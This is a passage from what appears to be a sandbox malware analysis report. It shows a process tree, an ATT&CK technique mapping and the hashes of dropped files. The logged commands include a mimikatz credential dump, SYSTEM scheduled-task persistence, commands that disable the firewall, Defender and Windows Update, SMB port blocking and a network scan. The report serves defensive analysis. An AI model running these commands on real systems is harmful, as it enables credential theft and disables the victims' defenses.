    - System Location Discovery: System Language Discovery
    PID:3188
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\teuulnibr\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\teuulnibr\Corporate\log.txt
  2⤵
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:2560
- - C:\Windows\teuulnibr\Corporate\vfshost.exe
    C:\Windows\teuulnibr\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4620
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "fktsqilkp" /ru system /tr "cmd /c C:\Windows\ime\vyqvqhk.exe"
  2⤵
  PID:4448
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2592
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "fktsqilkp" /ru system /tr "cmd /c C:\Windows\ime\vyqvqhk.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:5076
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "usckklvfi" /ru system /tr "cmd /c echo Y|cacls C:\Windows\kbtjlvyu\vyqvqhk.exe /p everyone:F"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1808
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "usckklvfi" /ru system /tr "cmd /c echo Y|cacls C:\Windows\kbtjlvyu\vyqvqhk.exe /p everyone:F"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3024
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "eybllewsp" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\jbcfjleil\illibi.exe /p everyone:F"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4636
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "eybllewsp" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\jbcfjleil\illibi.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:3596
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1360
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:2800
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1072
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:804
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1388
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:3536
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4932
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4452
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1216
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2880
- C:\Windows\TEMP\teuulnibr\ybiefmuji.exe
  C:\Windows\TEMP\teuulnibr\ybiefmuji.exe -accepteula -mp 764 C:\Windows\TEMP\teuulnibr\764.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2012
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:4028
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:1324
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  PID:5048
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1660
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      PID:4472
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh firewall set opmode mode=disable
  2⤵
  PID:3644
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:5028
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh Advfirewall set allprofiles state off
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1700
- - C:\Windows\SysWOW64\netsh.exe
    netsh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:4032
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3368
- - C:\Windows\SysWOW64\net.exe
    net stop MpsSvc
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3912
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MpsSvc
      4⤵
      PID:4000
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop WinDefend
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1724
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    PID:1456
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      System Location Discovery: System Language Discovery
      PID:4988
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop wuauserv
  2⤵
  - System Location Discovery: System Language Discovery
  PID:872
- - C:\Windows\SysWOW64\net.exe
    net stop wuauserv
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1296
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wuauserv
      4⤵
      System Location Discovery: System Language Discovery
      PID:1420
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config MpsSvc start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1460
- - C:\Windows\SysWOW64\sc.exe
    sc config MpsSvc start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:4952
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config SharedAccess start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4640
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    PID:1584
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config WinDefend start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2592
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:3108
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config wuauserv start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3996
- - C:\Windows\SysWOW64\sc.exe
    sc config wuauserv start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:3944
- C:\Windows\TEMP\xohudmc.exe
  C:\Windows\TEMP\xohudmc.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:4144
- C:\Windows\TEMP\teuulnibr\ybiefmuji.exe
  C:\Windows\TEMP\teuulnibr\ybiefmuji.exe -accepteula -mp 316 C:\Windows\TEMP\teuulnibr\316.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1856
- C:\Windows\TEMP\teuulnibr\ybiefmuji.exe
  C:\Windows\TEMP\teuulnibr\ybiefmuji.exe -accepteula -mp 2136 C:\Windows\TEMP\teuulnibr\2136.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1892
- C:\Windows\TEMP\teuulnibr\ybiefmuji.exe
  C:\Windows\TEMP\teuulnibr\ybiefmuji.exe -accepteula -mp 2504 C:\Windows\TEMP\teuulnibr\2504.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:5048
- C:\Windows\TEMP\teuulnibr\ybiefmuji.exe
  C:\Windows\TEMP\teuulnibr\ybiefmuji.exe -accepteula -mp 2632 C:\Windows\TEMP\teuulnibr\2632.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3900
- C:\Windows\TEMP\teuulnibr\ybiefmuji.exe
  C:\Windows\TEMP\teuulnibr\ybiefmuji.exe -accepteula -mp 2868 C:\Windows\TEMP\teuulnibr\2868.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3556
- C:\Windows\TEMP\teuulnibr\ybiefmuji.exe
  C:\Windows\TEMP\teuulnibr\ybiefmuji.exe -accepteula -mp 3084 C:\Windows\TEMP\teuulnibr\3084.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2316
- C:\Windows\TEMP\teuulnibr\ybiefmuji.exe
  C:\Windows\TEMP\teuulnibr\ybiefmuji.exe -accepteula -mp 3708 C:\Windows\TEMP\teuulnibr\3708.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3576
- C:\Windows\TEMP\teuulnibr\ybiefmuji.exe
  C:\Windows\TEMP\teuulnibr\ybiefmuji.exe -accepteula -mp 3804 C:\Windows\TEMP\teuulnibr\3804.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1460
- C:\Windows\TEMP\teuulnibr\ybiefmuji.exe
  C:\Windows\TEMP\teuulnibr\ybiefmuji.exe -accepteula -mp 3864 C:\Windows\TEMP\teuulnibr\3864.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1912
- C:\Windows\TEMP\teuulnibr\ybiefmuji.exe
  C:\Windows\TEMP\teuulnibr\ybiefmuji.exe -accepteula -mp 3952 C:\Windows\TEMP\teuulnibr\3952.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3776
- C:\Windows\TEMP\teuulnibr\ybiefmuji.exe
  C:\Windows\TEMP\teuulnibr\ybiefmuji.exe -accepteula -mp 3820 C:\Windows\TEMP\teuulnibr\3820.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4868
- C:\Windows\TEMP\teuulnibr\ybiefmuji.exe
  C:\Windows\TEMP\teuulnibr\ybiefmuji.exe -accepteula -mp 3440 C:\Windows\TEMP\teuulnibr\3440.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3888
- C:\Windows\TEMP\teuulnibr\ybiefmuji.exe
  C:\Windows\TEMP\teuulnibr\ybiefmuji.exe -accepteula -mp 1772 C:\Windows\TEMP\teuulnibr\1772.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4800
- C:\Windows\TEMP\teuulnibr\ybiefmuji.exe
  C:\Windows\TEMP\teuulnibr\ybiefmuji.exe -accepteula -mp 4660 C:\Windows\TEMP\teuulnibr\4660.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1432
- C:\Windows\TEMP\teuulnibr\ybiefmuji.exe
  C:\Windows\TEMP\teuulnibr\ybiefmuji.exe -accepteula -mp 1164 C:\Windows\TEMP\teuulnibr\1164.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1004
- C:\Windows\TEMP\teuulnibr\ybiefmuji.exe
  C:\Windows\TEMP\teuulnibr\ybiefmuji.exe -accepteula -mp 4796 C:\Windows\TEMP\teuulnibr\4796.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4260
- C:\Windows\TEMP\teuulnibr\ybiefmuji.exe
  C:\Windows\TEMP\teuulnibr\ybiefmuji.exe -accepteula -mp 3932 C:\Windows\TEMP\teuulnibr\3932.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1572
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Windows\teuulnibr\bftvueiwt\scan.bat
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4400
- - C:\Windows\teuulnibr\bftvueiwt\lbvnitihf.exe
    lbvnitihf.exe TCP 181.215.0.1 181.215.255.255 7001 512 /save
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    PID:3356
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6092
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:964
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5056
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4072
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2488
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2452

C:\Windows\SysWOW64\gyggue.exe
C:\Windows\SysWOW64\gyggue.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2068

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\vyqvqhk.exe
1⤵
PID:2468
- C:\Windows\ime\vyqvqhk.exe
  C:\Windows\ime\vyqvqhk.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4920

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\kbtjlvyu\vyqvqhk.exe /p everyone:F
1⤵
PID:1572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:4964
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\kbtjlvyu\vyqvqhk.exe /p everyone:F
  2⤵
  PID:1424

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\jbcfjleil\illibi.exe /p everyone:F
1⤵
PID:2620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:1020
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\jbcfjleil\illibi.exe /p everyone:F
  2⤵
  PID:1660

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\vyqvqhk.exe
1⤵
PID:5840
- C:\Windows\ime\vyqvqhk.exe
  C:\Windows\ime\vyqvqhk.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2620

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\kbtjlvyu\vyqvqhk.exe /p everyone:F
1⤵
PID:904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:3892
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\kbtjlvyu\vyqvqhk.exe /p everyone:F
  2⤵
  PID:4008

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\jbcfjleil\illibi.exe /p everyone:F
1⤵
PID:3776
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:1932
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\jbcfjleil\illibi.exe /p everyone:F
  2⤵
  PID:1424

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

OS Credential Dumping

T1003

LSASS Memory

T1003.001

Discovery

Network Service Discovery

T1046

Network Share Discovery

T1135

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\SysWOW64\Packet.dll

Filesize
95KB

MD5
86316be34481c1ed5b792169312673fd

SHA1
6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

SHA256
49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

SHA512
3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

Download Submit
C:\Windows\SysWOW64\wpcap.dll

Filesize
275KB

MD5
4633b298d57014627831ccac89a2c50b

SHA1
e5f449766722c5c25fa02b065d22a854b6a32a5b

SHA256
b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

SHA512
29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

Download Submit
C:\Windows\TEMP\jbcfjleil\config.json

Filesize
693B

MD5
f2d396833af4aea7b9afde89593ca56e

SHA1
08d8f699040d3ca94e9d46fc400e3feb4a18b96b

SHA256
d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

SHA512
2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

Download Submit
C:\Windows\TEMP\teuulnibr\1772.dmp

Filesize
8.6MB

MD5
c5df6df845bd1535e1e913258d28afb5

SHA1
ca165441a7c5515f39678de639694a62474bba3e

SHA256
5bc831898d4d5bd2214d1b66b6eeed280e9d333ee49aa0d5320069ef256f2e7b

SHA512
d28d5e11910e9f4d4d6ca4e5c1239e5411b94e7662641cb9b602b20202a3c4a2a96e01e4d42055eb048eea23b0d1c9797592921e4e5ef5b790c8398152c8d463

Download Submit
C:\Windows\TEMP\teuulnibr\2136.dmp

Filesize
4.1MB

MD5
618c711c4c42623295f813705bc5b8a8

SHA1
69f630f2f3183cbdfea487d708dada4bc563843e

SHA256
1e885d6c711a7b4be0d4cbaa6d1367ef33b7e00c767d122aa6a4f33be444352a

SHA512
a2a8b27c24242ea6130549236f88a1336eb45094f32a1ca134da7aed859f68dbb46c2506280f0b4ac431cb9032810f6b1af2c2f2fc07fd49cb9fa4dc890f123a

Download Submit
C:\Windows\TEMP\teuulnibr\2504.dmp

Filesize
3.8MB

MD5
ba3a0c80ebf1b48e0ad3dc33ab80cdf1

SHA1
4260c612b1e6ea6e50d8ade60f4f2f3e7b5af920

SHA256
840bb4cbd00f679d7fc85b1b192909bbf9c3d0b4b481789d1463327e90f4bbc9

SHA512
1e3270fbae658dbe5bcc5319384c6bd717a3ebf2cdf1de171a41dad212519c9dcc489e986fcfaacaaee396a91edc3cca8b90ffdd3aa3ad1a020255cffd45d31d

Download Submit
C:\Windows\TEMP\teuulnibr\2632.dmp

Filesize
2.9MB

MD5
fddb7515c602fa55d3ffd59c0c26a9f4

SHA1
a052fee18a24e8905854ea2644d2479f9ec0f12d

SHA256
b1aab0eb7c3be57bd5c1d350afa4d0228ed9ab9a791931468e42b87b0425ad53

SHA512
ebe6520821a9da062106511db2ad8dfd50ce9f51aefecc91ce9d4116f0b3a02ea5b204ed1080ffc024d7b99d7afa216ad8aff40d80d195c94f29c29ee5ec7718

Download Submit
C:\Windows\TEMP\teuulnibr\2868.dmp

Filesize
7.5MB

MD5
d2b0111781c965b45a94cb3a7282b2e9

SHA1
2ad10b07ff30c126d7aa2110a337b21e4181826e

SHA256
9e15783fe8a067a86a85cb49f02bea3d428155b3bb033afdce64b28f5702055e

SHA512
f5c5117de0f5460710ec4e638807a7f1c02880a6bd60966512831695140b5bad2f8acac9346b50edd54063265a075665e2af39364008863613764476bb6f2f4c

Download Submit
C:\Windows\TEMP\teuulnibr\3084.dmp

Filesize
818KB

MD5
cff3ba281408403acb17882504f7dc6d

SHA1
ac9e87fe01b574f39677839931fcffd5ecd0e9df

SHA256
cd2fbcd3441aa289e0dbb64b8fab837d0e76d84ca2462556458819ebf319b0a8

SHA512
1088b5b0750c8e5789d7628ed08c24a76b5bc6819606a67d1da37d9a93d7d420e10728a83b950dba2b8aeda1652f0ba4b444d3cfff651b054ae8521aba319ca2

Download Submit
C:\Windows\TEMP\teuulnibr\316.dmp

Filesize
33.5MB

MD5
ed8853eef833a846d891f82b76b116eb

SHA1
ae2d1c81aa8fc16eea4b262abd8139b97145fe29

SHA256
5920b460955f7ecbd9f8a03643b0eef954a6e56960505dee8c1657f042025056

SHA512
23202fb0da14bc2b9b3119b56658f97102f03e6189077c525d42a9e03bbfa6bf038f0dd0a12174e39372419f5485083d698bca4d8b3058e468c873029aa11b16

Download Submit
C:\Windows\TEMP\teuulnibr\3440.dmp

Filesize
26.0MB

MD5
34aeeb930c83e6f33e2db70738e45501

SHA1
333ae8882cc8b0c444193fcb2dba7dc21821aa56

SHA256
1042a7eaf764545868a6a6fe35652bd623de2dbfa8d229919e0590f66831aa94

SHA512
2887cea78a1d08f962dd85165e6ab99e3a1bbe9a852943c507f7a7aa331af9028214740e8327021a57927c38d47cc3538479ebdeb527d9c6a10fd6572e7231b9

Download Submit
C:\Windows\TEMP\teuulnibr\3708.dmp

Filesize
2.5MB

MD5
84cc7ea6d663cb26747e8d3334eee10a

SHA1
edcf5abfe1d15ec532b0bfb847a74c9a4c9ba520

SHA256
8f277d2a8573a43954bb020ac514bf945d360bae003bd666fc55c3b17c0f93ea

SHA512
f6f39d690d85bb91106fd52bb94fe33232aed4772dd7972b13875dd1f4da120dca16e0f1e27257799ff27f9d3120b9f803d02f744eecfd4780b6bdf13d097b1c

Download Submit
C:\Windows\TEMP\teuulnibr\3804.dmp

Filesize
21.0MB

MD5
69fb96758d0ffb203dcf8b535bda32fa

SHA1
35b94cf88fc660f914528163b12b50d1dc3438ec

SHA256
ea3caa923c74c83366a3ad5ce6219506cc5310a1fb1bb678b3dbfa93a2785212

SHA512
bcd6526b9ef5b9d3f32c0d1035a9f843c3ed7aa611a2832a3d9a30fea61f7f47e42f9bcf7e109a8fbfb122f2f0646e71a6f4de90507d97c9bb40068021423159

Download Submit
C:\Windows\TEMP\teuulnibr\3820.dmp

Filesize
1.3MB

MD5
fe1e943acf39c1e11009a00dba1e3522

SHA1
3e8dad9607b23036fbfa54317a593c6e792b95f8

SHA256
2498380dbe9cbb8bc8c3ad175c2e11f31bade884ee39194b73e88a62e223eac3

SHA512
87a194d6c9c4aa5e9dfd699d097b6c11419ef130e4b364a3bdc2875daf8d64f3e6b206ae832962029aeee694ba90b17f9fa108a0e0a5041bddb51533445e7bb0

Download Submit
C:\Windows\TEMP\teuulnibr\3864.dmp

Filesize
4.2MB

MD5
1b8a265bc59ae70df1bbaaf10cc9109d

SHA1
1d2c6a0ac4001db1d940df23a0af9ccb789c73ec

SHA256
565ca972b5d5f14cce1a96f17e38c48fb50c581683c8b73f0ba1bb020c064ed6

SHA512
c422571c13e62e695e723422fcb91912e587abafb7f102764277de377cf7caa947ba5449a35201f6adca5a5ec616a839cd1ddfb45c085fdebc63073080579837

Download Submit
C:\Windows\TEMP\teuulnibr\3952.dmp

Filesize
44.1MB

MD5
defb937c3d174f30bf47e372696560ca

SHA1
d15842564209a7d55c019d7e59f856322baedd95

SHA256
f821bde3b17fd9360fe1524d2e17839f51178be65ed5b597b14c5402d0922ca1

SHA512
456b471902608e1f475fc9930712c368613f70173b727fe2a48c1b3937a1b7132a8f661ba03226cbdbe82cc4c0fd906c2d88ff902979fa101b099ede0789a06d

Download Submit
C:\Windows\TEMP\teuulnibr\764.dmp

Filesize
1019KB

MD5
d69d6b8f3f57d41e7ea3c96ae084989d

SHA1
067328d91e4c7a76a83167e27f3c6f2ec82b581e

SHA256
1bbb73e958e01e659bd70d0397ab96c701c82d54d94f2d6ffb730bf977d38dc3

SHA512
7552234355bec96958865a3653e48de33a0da32b6ca132ed0ae989ec4f34a819fbbed86c80cd3f8f1b14bba619ca0068cff7c2aebfb9183ae8f871eee8cc31c0

Download Submit
C:\Windows\Temp\jbcfjleil\illibi.exe

Filesize
343KB

MD5
2b4ac7b362261cb3f6f9583751708064

SHA1
b93693b19ebc99da8a007fed1a45c01c5071fb7f

SHA256
a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

SHA512
c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

Download Submit
C:\Windows\Temp\nssA654.tmp\System.dll

Filesize
11KB

MD5
2ae993a2ffec0c137eb51c8832691bcb

SHA1
98e0b37b7c14890f8a599f35678af5e9435906e1

SHA256
681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

SHA512
2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

Download Submit
C:\Windows\Temp\nssA654.tmp\nsExec.dll

Filesize
6KB

MD5
b648c78981c02c434d6a04d4422a6198

SHA1
74d99eed1eae76c7f43454c01cdb7030e5772fc2

SHA256
3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

SHA512
219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

Download Submit
C:\Windows\Temp\teuulnibr\ybiefmuji.exe

Filesize
126KB

MD5
